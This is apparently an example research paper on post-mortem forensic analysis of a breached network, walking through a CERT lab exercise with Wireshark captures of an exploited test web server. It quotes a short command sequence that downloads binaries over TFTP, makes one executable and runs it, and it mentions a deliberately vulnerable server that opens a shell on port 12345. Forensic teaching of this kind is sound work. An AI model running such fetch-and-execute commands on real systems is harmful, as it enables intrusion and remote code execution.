Post Mortem Forensic Analysis - Research Paper Example

Post Mortem Forensic Analysis Introduction In the current advancements of the computing world, an attacker initiates prevalent attacks that are vivid and intense in order to compromise or destroying the target. Researchers have studied these attacks in order to provide a secure mechanism that may effectively detect and fight against these vivid attacks. These mechanisms known as IDS, antivirus, anti-spam, and anti-spywares do provide limited benefits to the end users. However, these secure mechanism frameworks do not support functionality of forensic investigations and post mortem analysis for any particular breach or incident within the network. In order to initialize a forensic analysis, the first step is to determine the point of the breach to the network. Likewise, after identifying the point of breach, a forensic examiner can evaluate its exploitation. Moreover, the examiners can also identity the source of the threat i.e. the Internet. As per the scenario, a large computer network is compromised by a threat that may have also exploited classified documents. The report will demonstrate the forensic analysis with the aid of FTK tools in order to identify the root cause of the threat. Overview If an organization is affected by a security breach, in some cases, it is complex to calculate risks related to information assets present on the network. Likewise, it depends on the severity of the threat that may have caused large disruptions in network-based services. This is the point where digital forensic expert are incorporated for identifying the threat, impact and network incidents caused by it. Organizations experience new techniques and methods from an ongoing investigation by a digital forensic expert. Likewise, the point of interception, methodology and protection etc. are considered to be critical. Moreover, financial institutions are keener to adopt forensic analysis, as this domain including business model and nature of the data, cannot compromise on security (Network postmortem: Forensic analysis after a compromise, n.d.). For instance, master card, visa, American express demonstrates a solid online security framework. In the current scenario, where a network is already breached by a threat, these forensic experts focus on three core factors i.e. (Network postmortem: Forensic analysis after a compromise, n.d.): A discovery process focused on understanding the application and network infrastructure, as well as the business information flow of the organization Interviews with key personnel to understand the facts of the case from the customer's perspective and identify suitable sources of forensics data Data collection to gather critical sources of evidence to support the investigation, followed by analysis Methodology Assuming that the threat has initially breached the application server that was serving as an intranet for the organization, forensic investigators construct a methodology that will monitor attacks from inbound and outbound networks. These three processes will be executed, in order to detect the cause and the source: pcap trace analysis that are initialized for server side attack pcap trace analysis that are initialized for client side attack netflow analysis initialized for network flow monitoring In order to capture attacks, forensic investigators implemented a vulnerable HTTP server. The server will acts as an original server and address every query related to HTTP. However, for processing a ‘POST’ request the server will initiate a separate thread that will encapsulate a shell incorporated by a port 12345. The replicated fake web server will process the shell code similarly to the original one. The tool that will be used for exploiting and capturing network traffic is ‘WireShark’(Cert Exercises Handbook – Scribd, n.d.). It is an open-source tool that is meant for capturing data packets and network traffic examination on wired and wireless networks (Wireshark Network Analysis n.d.). Similarly, this tool will capture and examine network traffic on the Ethernet interface connected to the fake web server. Apart from Wireshark, tftp server and tftp client will also be implemented. As the web server is equipped with Apache, one more tool named as exploit followed by the command (Cert Exercises Handbook – Scribd, n.d.): (/usr/share/exercises/07_NF/adds/exploit) Prior to start the replicated fake web server, there is a requirement for stopping Apache server services. The next step is to initialize the server type by executing the following command (Cert Exercises Handbook – Scribd, n.d.): (sudo /etc/init.d/http_server ) The next step is to initialized customized scripts named as interface_affected and interface_hacker. The pcap file will demonstrate the log files of the attacks that are initiated from an IP address that is dissimilar than the victim’s IP address. Executing Wire Shark Before executing the exploitation process, ‘Wireshark’ will be executed, in order to capture live traffic on the loop back interface. After executing the tool, local URL will be executed from the browser. In order to increase request from the same site, user will increase incoming request by navigating the local site. In this process, the activity will impose the copying of files related to malicious code or threats to the replicated fake web server. Likewise, attacker’s files will be copied to the root folder, as the server was logged in by the root credentials. Consequently, the files that are transmitted from the hacker’s computer to the fake replicated web server were captured by ‘Wireshark’ tool and therefore, the packets that resulted in exploiting the server were successfully possessed by ‘Wireshark’ that can now be investigated (Cert Exercises Handbook – Scribd, n.d.) As mentioned earlier, exploit operates on the port 12345, all the traffic that is redirected to this specific port can be analyzed. In order to analyze the port, filter is required that will separate the traffic transmitting from port 12345. Likewise, after initiating the TCP session, following commands will be executed (Cert Exercises Handbook – Scribd, n.d.): cd ~; atftp --get --remote-file exploit2 IP address; atftp --get --remote-file hello IP address; chmod +x hello; ./hello Conclusion In this small forensic post mortem report, we have demonstrated the importance of these digital forensic investigations that may significantly impact financial institutions due to their nature of business and paramount financial and information assets residing on the network. We have also demonstrated the methodology including several forensic investigation tools that may aid in extracting proofs and source of threats on the Internet. References Network postmortem: Forensic analysis after a compromise ... (n.d.). Retrieved from http://www.computerworld.com/s/article/87969/Network_postmortem_Forensic_analysis_after_a_compromise Cert Exercises Handbook - Scribd. (n.d.). Retrieved from http://www.scribd.com/doc/35011748/Cert-Exercises-Handbook Wireshark Network Analysis. (n.d.). Retrieved from http://wiresharkbook.com/articlewireshark101.html Read More